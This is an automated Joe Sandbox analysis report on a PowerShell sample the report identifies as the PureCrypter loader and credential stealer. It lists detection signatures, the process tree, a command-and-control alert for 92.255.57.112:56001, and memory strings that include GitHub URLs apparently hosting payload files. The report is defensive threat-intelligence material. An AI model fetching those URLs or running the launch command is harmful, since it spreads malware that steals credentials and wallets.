Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
92.255.57.112.ps1

Overview

General Information

Sample name:92.255.57.112.ps1
Analysis ID:1591628
MD5:7b7bab781f4b30aee1289f36a01606a0
SHA1:1b7a8d8302afa6f27f27d3d313865c2a4af61bdd
SHA256:e82de6b368baabcc81ce3316a319f27173e82b9c2e94a043bf42b62458dc5a98
Infos:

Detection

PureCrypter
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Detected PureCrypter Trojan
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
Tries to harvest and steal Bitcoin Wallet information
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • powershell.exe (PID: 6176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • RegSvcs.exe (PID: 7136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PureCrypterAccording to zscaler, PureCrypter is a fully-featured loader being sold since at least March 2021The malware has been observed distributing a variety of remote access trojans and information stealersThe loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus software productsPureCrypter features provide persistence, injection and defense mechanisms that are configurable in Googles Protocol Buffer message format No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    Process Memory Space: RegSvcs.exe PID: 7136JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4952, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", ProcessId: 6176, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4952, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1", ProcessId: 6176, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-15T08:33:11.565512+010020355951Domain Observed Used for C2 Detected92.255.57.11256001192.168.11.2049780TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C7C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157429117028.00000228DEC80000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.57.112:56001 -> 192.168.11.20:49780
      Source: global trafficTCP traffic: 192.168.11.20:49780 -> 92.255.57.112:56001
      Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
      Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158643986035.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: powershell.exe, 00000000.00000002.157428012843.00000228DEB69000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.c
      Source: RegSvcs.exe, 00000003.00000002.158642977497.0000000000F19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
      Source: RegSvcs.exe, 00000003.00000002.158643986035.0000000000F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab2
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.000000000339D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
      Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C67C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C82FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C832B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C7995000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C8389000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157417269940.00000228D6952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.157425977056.00000228DE809000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.158659913355.0000000005780000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: powershell.exe, 00000000.00000002.157400544873.00000228C8065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
      Source: RegSvcs.exe, 00000003.00000002.158646258869.0000000002EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853ECA4700_2_00007FF853ECA470
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853EC513A0_2_00007FF853EC513A
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853F90DAD0_2_00007FF853F90DAD
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B237F3_2_068B237F
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B00403_2_068B0040
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B69C83_2_068B69C8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B24543_2_068B2454
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B23883_2_068B2388
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B00063_2_068B0006
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B1E2E3_2_068B1E2E
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B1E373_2_068B1E37
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_068B1F253_2_068B1F25
      Source: classification engineClassification label: mal88.spyw.evad.winPS1@4/5@0/1
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2776:304:WilStaging_02
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\3e74489724f9
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmlfz5sh.jw4.ps1Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.112.ps1"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.157400544873.00000228C69EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157400544873.00000228C7C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.157429117028.00000228DEC80000.00000004.08000000.00040000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853ECBC8C pushad ; iretd 0_2_00007FF853ECBC8D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853EC4C00 push E8FFFFFFh; iretd 0_2_00007FF853EC4C0D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853EC2315 pushad ; iretd 0_2_00007FF853EC232D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF853ECA8DC push ebx; retf 0_2_00007FF853ECA8DD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
